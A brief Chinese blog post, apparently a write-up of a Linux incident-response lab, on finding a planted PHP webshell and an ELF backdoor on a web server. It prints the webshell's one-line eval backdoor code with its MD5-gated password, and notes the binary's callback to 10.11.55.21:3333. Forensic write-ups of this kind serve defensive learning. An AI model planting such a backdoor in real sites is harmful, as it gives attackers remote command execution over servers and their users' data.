玄机
做一做玄机、 学一学应急。 做了几个突然想起。博客开个贴子记录下来也是挺好的😋
第一章 应急响应- Linux入侵排查
- web目录存在木马,请找到木马的密码提交
登录上服务器,将web目录打包。下载下来用d盾扫一波
1.php
内容
.shell.php
内容
index.php
内容
index.php
作用是在 /var/www/html/
下生成.shell.php
然后在.shell.php
中写入<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>
这个马的密码是hello
网站目录下面还有一个 shell(1).elf
放进ida里面看了一下,发现自己根本看不懂
就起了一个docker 将它在docker里面执行了一下
然后再看网络连接状态netstat -antlp
连接了10.11.55.21:3333
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Yliken!